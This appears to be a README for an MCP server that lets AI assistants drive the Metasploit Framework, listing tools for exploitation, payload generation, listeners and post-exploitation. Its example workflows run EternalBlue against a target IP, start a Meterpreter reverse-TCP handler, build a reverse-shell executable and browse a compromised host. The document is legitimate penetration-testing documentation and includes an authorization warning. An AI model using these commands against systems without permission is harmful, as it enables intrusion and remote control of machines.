local-only server
The server can only run on the client’s local machine because it depends on local resources.
Integrations
Provides a bridge to the Metasploit Framework penetration testing platform, enabling exploitation workflows, payload generation and execution, post-exploitation tools, listener management, and auxiliary module support.
Metasploit MCP Server
A Model Context Protocol (MCP) server for Metasploit Framework integration.
Description
This MCP server provides a bridge between large language models like Claude and the Metasploit Framework penetration testing platform. It allows AI assistants to dynamically access and control Metasploit functionality through standardized tools, enabling a natural language interface to complex security testing workflows.
Features
Payload Generation and Execution
- generate_payload: Generate payload files using Metasploit RPC (saves files locally)
- execute_local_program: Execute a locally saved program (e.g., generated payloads)
Exploitation Workflow
- list_exploits: Search and list available Metasploit exploit modules
- list_payloads: Search and list available Metasploit payload modules
- run_exploit: Configure and execute an exploit against a target
- list_active_sessions: Show current Metasploit sessions
- send_session_command: Run a command in an active session
Post-Exploitation Tools
- get_system_info: Retrieve system information from a Meterpreter session
- get_user_id: Get the current user context of a session
- list_processes: List running processes on the target system
- migrate_process: Move a Meterpreter session to another process
- filesystem_list: List files in a directory on the target system
Listener Management
- list_listeners: Show all active handlers and background jobs
- start_listener: Create a new multi/handler to receive connections
- stop_job: Terminate any running job or handler
Auxiliary Module Support
- run_auxiliary_module: Run any Metasploit auxiliary module with options
Prerequisites
- Metasploit Framework installed and msfrpcd running
- Python 3.10 or higher
- Required Python packages (see requirements.txt)
Installation
- Clone this repository
- Install dependencies:Copy
- Configure environment variables (optional):Copy
Usage
Start the Metasploit RPC service:
For Claude Desktop integration, configure claude_desktop_config.json
:
Security Considerations
⚠️ IMPORTANT SECURITY WARNING:
This tool provides direct access to Metasploit Framework capabilities, which include powerful exploitation features. Use responsibly and only in environments where you have explicit permission to perform security testing.
- Always validate and review all commands before execution
- Only run in segregated test environments or with proper authorization
- Be aware that post-exploitation commands can result in significant system modifications
Example Workflows
Basic Exploitation
- List available exploits:
list_exploits("ms17_010")
- Select and run an exploit:
run_exploit("exploit/windows/smb/ms17_010_eternalblue", "192.168.1.100", 445)
- List sessions:
list_active_sessions()
- Run commands:
send_session_command(1, "whoami")
Post-Exploitation
- Get system information:
get_system_info(1)
- List running processes:
list_processes(1)
- Migrate to a more stable process:
migrate_process(1, 1234)
- Browse the filesystem:
filesystem_list(1, "C:\\Users")
Handler Management
- Start a listener:
start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
- List active handlers:
list_listeners()
- Generate a payload:
generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})
- Stop a handler:
stop_job(1)
Configuration Options
Payload Save Directory
By default, payloads generated with generate_payload
are saved to a payloads
directory in your home folder (~/payloads
or C:\Users\YourUsername\payloads
). You can customize this location by setting the PAYLOAD_SAVE_DIR
environment variable.
Setting the environment variable:
- Windows (PowerShell):Copy
- Windows (Command Prompt):Copy
- Linux/macOS:Copy
- In Claude Desktop config:Copy
Note: If you specify a custom path, make sure it exists or the application has permission to create it. If the path is invalid, payload generation might fail.
License
Apache 2.0
This server cannot be installed
Provides a bridge between large language models and the Metasploit Framework, enabling AI assistants to access and control penetration testing functionality through natural language.